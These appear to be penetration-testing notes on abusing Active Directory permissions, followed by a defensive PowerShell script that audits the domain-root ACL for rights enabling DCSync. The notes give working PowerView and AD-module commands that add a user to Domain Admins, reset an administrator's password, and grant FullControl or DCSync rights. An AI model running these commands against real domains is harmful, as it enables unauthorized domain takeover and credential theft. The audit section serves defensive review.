Abusing Write-Member

Using PowerView:

Add-DomainGroupMember -Identity 'Domain Admins' -Members '<user>' -Verbose

Using ActiveDirectory Module:

Add-ADGroupMember -Identity 'Domain Admins' -Members '<user>'

Abusing ResetPassword

Using PowerView:

Set-DomainUserPassword -Identity '<admin_to_change_psw>' -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

Using ActiveDirectory Module:

Set-ADAccountPassword -Identity '<admin_to_change_psw>' -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

Abusing FullControl or DCSync on Domain object

For example, with Domain Admin privileges the ACL of the domain root can be modified to grant a principal rights such as FullControl or the ability to run DCSync.

<aside> ℹ️ A DCSync attack does not require FullControl; holding only these three permissions on the domain object is enough:

[image: the three permissions]

</aside>

Add FullControl rights with PowerView:

Add-DomainObjectAcl -TargetIdentity "DC=<domain>,DC=<domain>,DC=<domain>" -PrincipalIdentity '<user>' -Rights All -PrincipalDomain '<FQDN domain>' -TargetDomain '<FQDN domain>' -Verbose

Add only DCSync rights with PowerView:

Add-DomainObjectAcl -TargetIdentity "DC=<domain>,DC=<domain>,DC=<domain>" -PrincipalIdentity '<user>' -Rights DCSync -PrincipalDomain '<FQDN domain>' -TargetDomain '<FQDN domain>' -Verbose

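To find out who already holds the rights abused above on the domain root, the following PowerShell audit (an added defensive example, not part of the original notes) lists every principal granted FullControl, WriteDacl, unrestricted ExtendedRight, or one of the three replication extended rights, and flags anything outside an allow-list. It assumes the RSAT ActiveDirectory module and a domain-joined session; the allow-list is an assumption to adjust per environment.

```powershell
# Added example: audit the domain-root ACL for rights that enable DCSync or
# lead to it (GenericAll, WriteDacl, blanket ExtendedRight, replication rights).
Import-Module ActiveDirectory

# Extended-right GUIDs that together grant DCSync.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

$Domain   = Get-ADDomain
$NetBios  = $Domain.NetBIOSName
# Principals that hold these rights by default (assumption: extend with your own
# service accounts, e.g. an Azure AD Connect account, after verifying them).
$Expected = @(
    'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
    'BUILTIN\Administrators', "$NetBios\Domain Controllers",
    "$NetBios\Read-only Domain Controllers", "$NetBios\Domain Admins",
    "$NetBios\Enterprise Admins"
)

$Acl = Get-Acl -Path "AD:\$($Domain.DistinguishedName)"

$Acl.Access | ForEach-Object {
    $ace = $_
    if ($ace.AccessControlType -ne 'Allow') { return }   # only grants matter here
    $guid   = $ace.ObjectType.ToString()
    $rights = $ace.ActiveDirectoryRights.ToString()
    $reason = $null
    if     ($rights -match 'GenericAll')  { $reason = 'GenericAll (FullControl)' }
    elseif ($rights -match 'WriteDacl')   { $reason = 'WriteDacl (can grant itself DCSync)' }
    elseif ($rights -match 'ExtendedRight' -and $guid -eq [guid]::Empty.ToString()) {
        $reason = 'All extended rights (includes DCSync)'
    }
    elseif ($ReplicationRights.ContainsKey($guid)) { $reason = $ReplicationRights[$guid] }
    if (-not $reason) { return }

    $who = $ace.IdentityReference.Value
    [pscustomobject]@{
        Principal = $who
        Right     = $reason
        Status    = if ($Expected -contains $who) { 'expected' } else { 'REVIEW' }
    }
} | Sort-Object Status, Principal | Format-Table -AutoSize
```

Any principal marked REVIEW should be traced back to a change record; the PowerView commands above leave exactly this kind of ACE behind.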